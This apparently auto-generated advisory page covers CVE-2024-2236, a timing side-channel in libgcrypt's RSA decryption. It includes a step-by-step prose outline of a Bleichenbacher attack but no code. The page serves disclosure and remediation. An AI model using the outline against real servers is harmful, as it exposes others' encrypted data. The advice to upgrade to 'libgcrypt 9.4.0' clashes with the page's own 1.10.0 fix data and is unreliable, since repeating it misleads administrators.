libgcrypt: timing-based side-channel flaw in libgcrypt's RSA implementation (CVE-2024-2236) #shorts

Summary

Welcome to today’s cybersecurity briefing. We’re discussing CVE-2024-2236, a moderate-severity timing-based side-channel vulnerability in libgcrypt’s RSA implementation. This flaw can be exploited remotely to mount a Bleichenbacher-style attack, potentially decrypting RSA ciphertexts.

Product details

The issue affects libgcrypt, the GNU cryptographic library widely used by Linux distributions and applications for secure cryptographic operations. Versions prior to 9.4.0 are vulnerable. Major vendors such as SUSE and Red Hat bundle libgcrypt in their enterprise Linux releases and have issued advisories and patches.

Vulnerability type summary

This is an observable timing discrepancy vulnerability. By measuring subtle variations in processing time when handling RSA operations, an attacker can infer internal computations. Such side-channel leaks break the confidentiality guarantees of RSA PKCS#1 v1.5 decryption routines.

Details of the vulnerability

In libgcrypt’s RSA code path, certain branches take longer to execute depending on bits of the decrypted plaintext. An attacker supplies chosen ciphertexts over a remote interface and records response times. Over multiple queries, these timing differences enable a classical Bleichenbacher attack, recovering the original plaintext without knowing the private key. SUSE has released patches; Red Hat’s updated RPMs mark versions ≥1.10.0-11.el9 as unaffected.

Conclusion

CVE-2024-2236 underscores the power of side-channel attacks even against well-established algorithms like RSA. Administrators and developers should immediately apply vendor updates for libgcrypt 9.4.0 or later. Validate your supply chain, monitor for unusual decryption workloads, and stay current on cryptographic library patches to maintain data confidentiality.

Watch the full video on YouTube: CVE-2024-2236

Remediation and exploitation details

This chain involves the following actors

  • Remote attacker: Initiates the timing-based side-channel and Bleichenbacher-style decryption attack

This following systems are involved

  • libgcrypt (Provides RSA encryption and decryption routines): Vulnerable component (versions prior to 9.4.0)
  • Dependent applications (Use libgcrypt for RSA operations (for example, TLS servers or secure messaging)): Indirectly at risk via the vulnerable library

Attack entry point

  • RSA decryption interface: Function in libgcrypt handling RSA decryption requests, exposed by applications
  • Response timing and error feedback: Observable differences in processing time or error messages when padding checks succeed or fail

Remediation actions

System administrator
Upgrade libgcrypt to version 9.4.0 or later
libgcrypt
Library maintainer
Implement constant-time padding checks and remove timing variations in RSA decryption
libgcrypt

Exploitation actions

Service enumeration

Remote attacker
Identify a service using an unpatched libgcrypt RSA decryption endpoint to serve as a decryption oracle
Dependent applications
Examples:
  • Scanning TLS servers for supported rsa_pkcs1_padding cipher suites and version banners.

Chosen-ciphertext queries

Remote attacker
Send chosen RSA ciphertexts with controlled variations in the padding bytes to the decryption interface
libgcrypt
Examples:
  • Altering a valid PKCS#1 v1.5 encrypted block at specific byte positions and submitting it in a handshake.

Timing analysis

Remote attacker
Measure response times and observe any error codes for each ciphertext to distinguish valid from invalid padding outcomes
libgcrypt
Examples:
  • Recording millisecond-level timing differences when the library accepts or rejects padding.

Plaintext interval narrowing

Remote attacker
Use timing results to eliminate impossible plaintext candidates and narrow the interval of possible plaintext values following Bleichenbacher’s method
libgcrypt
Examples:
  • Applying modular arithmetic bounds after each batch of timing measurements to shrink the search space.

Iterative decryption recovery

Remote attacker
Iteratively repeat ciphertext queries, timing measurements, and interval refinements until the full RSA plaintext is recovered
libgcrypt
Examples:
  • Completing the attack after several thousand crafted queries to reconstruct the original message.

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2024-2236
Description
A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.
Provider
redhat
CWE / problem types
Observable Timing Discrepancy
Affected Software Versions
None:None:[{'status': 'affected', 'version': '0', 'lessThan': '9.4.0', 'versionType': 'semver'}],Red Hat:Red Hat Enterprise Linux 9:[{'version': '0:1.10.0-11.el9', 'lessThan': '*', 'versionType': 'rpm', 'status': 'unaffected'}],Red Hat:Red Hat Enterprise Linux 9:[{'version': '0:1.10.0-11.el9', 'lessThan': '*', 'versionType': 'rpm', 'status': 'unaffected'}],Red Hat:Red Hat Enterprise Linux 9.2 Extended Update Support:[{'version': '0:1.10.0-10.el9_2.1', 'lessThan': '*', 'versionType': 'rpm', 'status': 'unaffected'}],Red Hat:Red Hat Enterprise Linux 9.4 Extended Update Support:[{'version': '0:1.10.0-10.el9_4.1', 'lessThan': '*', 'versionType': 'rpm', 'status': 'unaffected'}],Red Hat:Red Hat Enterprise Linux 10:None,Red Hat:Red Hat Enterprise Linux 6:None,Red Hat:Red Hat Enterprise Linux 7:None,Red Hat:Red Hat Enterprise Linux 8:None
Date Published
2024-03-06T22:07:16.617Z
Last Updated
2025-08-03T11:24:55.627Z